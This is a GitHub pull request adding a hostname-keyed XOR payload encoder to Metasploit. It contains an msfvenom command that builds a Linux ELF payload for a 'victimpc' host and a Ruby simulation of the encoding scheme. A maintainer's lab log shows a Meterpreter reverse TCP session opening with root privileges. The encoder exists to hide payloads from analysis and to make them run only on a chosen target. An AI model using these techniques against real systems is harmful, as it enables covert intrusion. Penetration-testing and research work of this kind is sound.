
Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit) #12033

Merged: 1 commit, Jul 23, 2019

Conversation

osospeed (Contributor) commented Jul 1, 2019

xor_context

Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit).

How to

  • Copy the file xor_context.rb to the encoders folder: /opt/metasploit/modules/encoders/x64/xor_context.rb
  • You can use the module inside Metasploit or msfvenom:
    msfvenom --platform linux -p linux/x64/exec cmd='ls -la' -e x64/xor_context C_HOSTNAME=victimpc -f elf -o test
  • The resulting file will work only on machines having 'victimpc' as hostname.

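The steps above describe the idea of a context-keyed encoder: the payload is XORed with a key derived from the target's hostname, and the decoder stub on the target recomputes that key from the real hostname, so the binary never carries the key and only decodes correctly on the intended machine. The following Ruby script, added here as an editor's illustration and not the PR's xor_context.rb module, simulates both sides. The key schedule (hostname bytes cycled across the payload), the function names, and the sample payload bytes are assumptions chosen for the example; the real module's key derivation may differ.

```ruby
# Simulation of a hostname-keyed XOR encoder and its decoder.
# Added example; not the xor_context.rb module from this PR. The key
# schedule (hostname bytes cycled over the payload) is an assumption.

# Derive the XOR keystream from the hostname by cycling its bytes across
# the payload length. Any deterministic function of the hostname that both
# encoder and decoder can compute would work the same way.
def hostname_keystream(hostname, length)
  raise ArgumentError, 'hostname must not be empty' if hostname.empty?
  key = hostname.bytes
  Array.new(length) { |i| key[i % key.size] }
end

# Encoder side (attacker's box, e.g. inside msfvenom): XOR each payload
# byte with the keystream derived from the expected target hostname.
# The hostname itself is never written into the output.
def xor_context_encode(payload, hostname)
  ks = hostname_keystream(hostname, payload.bytesize)
  payload.bytes.each_with_index.map { |b, i| b ^ ks[i] }.pack('C*')
end

# Decoder side (what the stub does on the target after reading the
# hostname via uname(2)/gethostname(2)): recompute the keystream from the
# *actual* hostname and XOR again. XOR is its own inverse, so the same
# routine serves both directions.
def xor_context_decode(encoded, actual_hostname)
  xor_context_encode(encoded, actual_hostname)
end

# Models the behaviour in the PR's test run: decoded bytes only "run" if
# they equal the original payload; with the wrong hostname the stub jumps
# into garbage, which shows up as a segfault rather than a clean exit.
def run_on_host(encoded, original_payload, actual_hostname)
  decoded = xor_context_decode(encoded, actual_hostname)
  decoded == original_payload ? :executed : :segfault
end

# Constructed sample bytes standing in for linux/x64/exec shellcode;
# these are not real or complete shellcode.
SAMPLE_PAYLOAD = "\x48\x31\xc0\x48\x31\xff\x0f\x05".b
TARGET_HOSTNAME = 'victimpc'

if __FILE__ == $PROGRAM_NAME
  blob = xor_context_encode(SAMPLE_PAYLOAD, TARGET_HOSTNAME)
  puts "encoded blob : #{blob.unpack1('H*')}"
  puts "on victimpc  : #{run_on_host(blob, SAMPLE_PAYLOAD, 'victimpc')}"
  puts "on unbantos  : #{run_on_host(blob, SAMPLE_PAYLOAD, 'unbantos')}"
end
```

Two caveats a practitioner would keep in mind with any encoder of this shape: the keyspace is only as large as the set of plausible hostnames, so an analyst who recovers the decoder stub and can guess the target's naming convention can brute-force the key offline against known shellcode prologues; and XOR with an arbitrary key can produce NUL or other bad characters in the encoded body, which does not matter for a standalone ELF but does for injection vectors that stop at a NUL.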
@osospeed osospeed mentioned this pull request Jul 1, 2019
@wvu wvu added the feature label Jul 1, 2019
@wvu wvu self-assigned this Jul 15, 2019
@wvu wvu changed the title Create xor_context.rb Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit). Jul 16, 2019
@wvu wvu changed the title Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit). Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit) Jul 18, 2019
wvu (Contributor) commented Jul 23, 2019

root@ubuntu-xenial:/vagrant# ./test
total 60
drwxr-xr-x  1 vagrant vagrant   192 Jul 23  2019 .
drwxr-xr-x 24 root    root     4096 Jul 23 06:57 ..
drwxr-xr-x  1 vagrant vagrant   128 Jul 23 06:57 .vagrant
-rw-r--r--  1 vagrant vagrant  3013 Jul 23 06:57 Vagrantfile
-rwxr-xr-x  1 vagrant vagrant   210 Jul 23 07:06 test
-rw-------  1 vagrant vagrant 48164 Jul 23 06:57 ubuntu-xenial-16.04-cloudimg-console.log
root@ubuntu-xenial:/vagrant# hostname unbantos
root@ubuntu-xenial:/vagrant# ./test
Segmentation fault (core dumped)
root@ubuntu-xenial:/vagrant# hostname ubuntu-xenial
root@ubuntu-xenial:/vagrant# ./test
total 60
drwxr-xr-x  1 vagrant vagrant   192 Jul 23 07:07 .
drwxr-xr-x 24 root    root     4096 Jul 23 06:57 ..
drwxr-xr-x  1 vagrant vagrant   128 Jul 23 06:57 .vagrant
-rw-r--r--  1 vagrant vagrant  3013 Jul 23 06:57 Vagrantfile
-rwxr-xr-x  1 vagrant vagrant   210 Jul 23 07:06 test
-rw-------  1 vagrant vagrant 48164 Jul 23 06:57 ubuntu-xenial-16.04-cloudimg-console.log
root@ubuntu-xenial:/vagrant#
root@ubuntu-xenial:/vagrant# ./meterpreter
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58370) at 2019-07-23 02:11:53 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
root@ubuntu-xenial:/vagrant# hostname ubunutos
root@ubuntu-xenial:/vagrant# ./meterpreter
Segmentation fault (core dumped)
root@ubuntu-xenial:/vagrant#

@wvu wvu merged commit 51fe618 into rapid7:master Jul 23, 2019
wvu added a commit that referenced this pull request Jul 23, 2019
wvu (Contributor) commented Jul 23, 2019

Release Notes

A hostname-keyed encoder for x64 Linux payloads is now available.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Aug 6, 2019